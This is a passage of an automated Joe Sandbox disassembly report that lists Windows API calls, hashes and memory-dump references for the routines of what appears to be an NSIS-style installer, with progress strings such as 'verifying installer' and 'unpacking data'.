                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                              • String ID: 9
                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                              • Opcode ID: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                              • Instruction ID: b311e590087b617af27c489dd20f6d509b220c8bdff7a9a3342c218b0a6eff93
                                                                                                                                              • Opcode Fuzzy Hash: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                              • Instruction Fuzzy Hash: 57511D75D04119AADF20EFD4CA85AAEBB79FF44304F14817BE501F62D0D7B89D828B58
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                              • lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                              • lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                              • SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                              • Opcode ID: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                              • Instruction ID: 03453bb2bff48f2ebe7eef3f6a9ba8bdb22b1403b4f5d045e67352473deb1f71
                                                                                                                                              • Opcode Fuzzy Hash: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                              • Instruction Fuzzy Hash: E221AE71800218FACF019F65DD8498FBFB8EF45354F10803AF944B22A0C77A8A909F68
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040308C
                                                                                                                                              • wsprintfW.USER32 ref: 004030BA
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                                                                                                                • Part of subcall function 00403037: MulDiv.KERNEL32(00000000,00000064,000377E3), ref: 0040304C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                              • String ID: ... %d%%
                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                              • Opcode ID: 166ce091c32d309e4fa310a444bcd8b9ff139d0f29b7c4b4c095a56911891c85
                                                                                                                                              • Instruction ID: b005de13b07ab1df3b0a0d37ac4da2542258f94e3c9e0ca78ad4bdefce21122a
                                                                                                                                              • Opcode Fuzzy Hash: 166ce091c32d309e4fa310a444bcd8b9ff139d0f29b7c4b4c095a56911891c85
                                                                                                                                              • Instruction Fuzzy Hash: B901CC70402220EBCB21AF51AE4AA6B7F6CFB00B46F14457BF441B11D4DAB84540DBAF
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                                                                                                              • GetMessagePos.USER32 ref: 00404FFF
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00405019
                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                              • String ID: f
                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                              • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                                                                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                              • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                                                                                                              APIs
                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                                                                                              • wsprintfW.USER32 ref: 0040300A
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                              • Opcode ID: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                              • Instruction ID: f5d0dfdab9bbc179110c2e882a8d19bdfb033941f80f33e9338fd5ae6b2d935a
                                                                                                                                              • Opcode Fuzzy Hash: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                              • Instruction Fuzzy Hash: BDF0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AFA45B51D0DBB996598F99
                                                                                                                                              APIs
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                              • Opcode ID: fb46b4e8df1db46309afd02b3fdc802fdc32471e2582139a23931f61c0d3c173
                                                                                                                                              • Instruction ID: 2a34c59540e1e2abd0e75fc718a4647e5be88802d3978a8477eddc4b0ca47f36
                                                                                                                                              • Opcode Fuzzy Hash: fb46b4e8df1db46309afd02b3fdc802fdc32471e2582139a23931f61c0d3c173
                                                                                                                                              • Instruction Fuzzy Hash: 2531B171D00124BBCF21AFA5DD89D9E7E79AF45364F14023AF411762E1CB794D418F68
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                              • wsprintfW.USER32 ref: 00404F78
                                                                                                                                              • SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                              • String ID: %u.%u%s%s$H'D
                                                                                                                                              • API String ID: 3540041739-2781796796
                                                                                                                                              • Opcode ID: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                              • Instruction ID: afccc7aac3e313c9cd9c08cd77de86888644faadf6bfb13213ca5942e74a4345
                                                                                                                                              • Opcode Fuzzy Hash: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                              • Instruction Fuzzy Hash: 2311B7739041283BDB0065AD9C46E9E369CEB85374F254637FA26F71D1EA79CC2182E8
                                                                                                                                              APIs
                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                              • CharNextW.USER32(?,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                              • CharPrevW.USER32(?,?,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                              • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                              • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                                                                                                              • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                              • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                                                                                                              APIs
                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                              • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                                                                              • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                                                                                                              • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                                                                              • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                              • Opcode ID: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                              • Instruction ID: 8b1e6a7b1bb1698afdfead794f6417fbb3764ba01e46f9acc2dad3d3b5bdcb0f
                                                                                                                                              • Opcode Fuzzy Hash: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                              • Instruction Fuzzy Hash: 26213B72D04119AFCB05DF98DE85AEEBBB5EB08300F14003AF945F62A0D7749D81DB98
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(?), ref: 00401E76
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                              • Opcode ID: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                              • Instruction ID: 75d1d1a794b0a88cdf1cba10915d0c929158808af8533b27f0e618500a238d04
                                                                                                                                              • Opcode Fuzzy Hash: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                              • Instruction Fuzzy Hash: 5C01D475900260FFEB005BB5AD0DBDD7FB0AB29300F50C83AF542B61E2CAB904448B2D
                                                                                                                                              APIs
                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                              • String ID: !
                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                              • Opcode ID: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                              • Instruction ID: 9c099894a08b5387b140c0c6ceeae01ce9e162d44e3ef65fd99a7f94bc085c8a
                                                                                                                                              • Opcode Fuzzy Hash: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                              • Instruction Fuzzy Hash: 00219E71D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B889418B98
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004056CA
                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                                                                                                                • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                              • Opcode ID: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                              • Instruction ID: 4a72d77d5ba7db911775b8fd6e8698557fa8fe3088d7b3c11d294ca78c68b4d0
                                                                                                                                              • Opcode Fuzzy Hash: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
